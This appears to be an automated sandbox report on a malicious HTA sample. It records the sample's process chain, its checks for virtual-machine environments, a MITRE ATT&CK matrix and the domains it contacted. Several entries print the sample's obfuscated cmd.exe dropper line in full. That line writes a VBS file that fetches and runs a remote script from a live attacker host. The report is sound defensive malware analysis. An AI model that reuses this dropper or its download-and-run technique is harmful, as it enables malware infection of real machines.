Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1182B0 push ebp; iretd 0_3_0C1182B8
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0C1104B4 push esp; iretd 0_3_0C1104B9

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wscript.exe, 00000009.00000002.25362404236.0000000000889000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.0000000000883000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361725371.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 RTMTBGTBGT6
Source: mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479810428.000000000307D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478339729.000000000307D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`.I
Source: wscript.exe, 00000009.00000003.25361725371.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .VMware Virtual PlatformCIWdgJC
Source: mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479810428.000000000307D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478339729.000000000307D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxm
Source: mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464801498.0000000006F3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478552487.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.000000000082D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.25362150202.000000000085E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000009.00000003.25361413775.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareJJBIN
Source: wscript.exe, 00000009.00000002.25362404236.0000000000889000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.0000000000883000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361725371.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0Hyper-V 2008 Beta or RC0VGCG`
Source: wscript.exe, 00000009.00000002.25362404236.0000000000889000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.0000000000883000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361725371.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 R2XGQXGQXGQ{`WB,
Source: wscript.exe, 00000009.00000002.25362150202.000000000085E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.25361413775.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VGEHU$
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts2
Windows Management Instrumentation
111
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Disable or Modify Tools
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection
NTDS33
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579831 Sample: Archivo-PxFkiLTWYG-23122024... Startdate: 23/12/2024 Architecture: WINDOWS Score: 76 40 102.57.205.92.host.secureserver.net 2->40 42 www.americanas.com.br 2->42 44 6 other IPs or domains 2->44 54 Sigma detected: Suspicious MSHTA Child Process 2->54 56 Sigma detected: WScript or CScript Dropper 2->56 58 Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder 2->58 60 2 other signatures 2->60 11 mshta.exe 32 2->11         started        signatures3 process4 dnsIp5 46 securepubads.g.doubleclick.net 142.250.189.226, 443, 49751, 49763 GOOGLEUS United States 11->46 48 s3-r-w.sa-east-1.amazonaws.com 3.5.232.230, 443, 49757 AMAZON-02US United States 11->48 50 s3-sa-east-1.amazonaws.com 52.95.165.10, 443, 49758 AMAZON-02US United States 11->50 64 Obfuscated command line found 11->64 15 cmd.exe 1 11->15         started        signatures6 process7 signatures8 66 Obfuscated command line found 15->66 18 cmd.exe 2 15->18         started        22 conhost.exe 15->22         started        24 cmd.exe 1 15->24         started        process9 file10 36 C:\Users\Public\cNOV.vbs, ASCII 18->36 dropped 62 Command shell drops VBS files 18->62 26 cmd.exe 1 18->26         started        28 cmd.exe 18->28         started        signatures11 process12 process13 30 cmd.exe 3 2 26->30         started        process14 32 wscript.exe 14 30->32         started        dnsIp15 38 102.57.205.92.host.secureserver.net 92.205.57.102, 443, 49760, 49762 GD-EMEA-DC-SXB1DE Germany 32->38 52 System process connects to network (likely due to code injection or exploit) 32->52 signatures16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
142.250.189.226
truefalse
    high
    102.57.205.92.host.secureserver.net
    92.205.57.102
    truetrue
      unknown
      s3-sa-east-1.amazonaws.com
      52.95.165.10
      truefalse
        unknown
        s3-r-w.sa-east-1.amazonaws.com
        3.5.232.230
        truefalse
          high
          www.americanas.com.br
          unknown
          unknownfalse
            high
            statics-americanas.b2w.io
            unknown
            unknownfalse
              unknown
              logs-referer.s3-sa-east-1.amazonaws.com
              unknown
              unknownfalse
                unknown
                images-americanas.b2w.io
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://102.57.205.92.host.secureserver.net//g1true
                    unknown
                    https://102.57.205.92.host.secureserver.net/g1/true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodommshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489837872.000000000B648000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400654336.000000000ABA5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.americanas.com.br/hotsite/app?chave=dk_hm_hd_1_0_baixeoapp_faixaLin&mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima3mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.americanas.com.br/especial/oferta-do-dia?chave=prf_hm_0_tt_7_mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484145246.0000000009467000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462689449.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460429722.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486497616.000000000AA71000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488630378.000000000ACF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403038428.000000000AA70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460802201.0000000009466000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                              high
                              https://www.americanas.com.br/hotsite/atendimentomshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401062587.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463326709.000000000AB55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487271254.000000000AB59000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380864273.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404256581.000000000AB51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.pngmshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478510709.000000000AC5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484225410.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395079124.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC5F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009491000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25436128428.0000000009C46000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.americanas.com.br/categoria/mercado/bebes?chave=pc_cat_menu_bebes_mercadoTmshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngmshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, 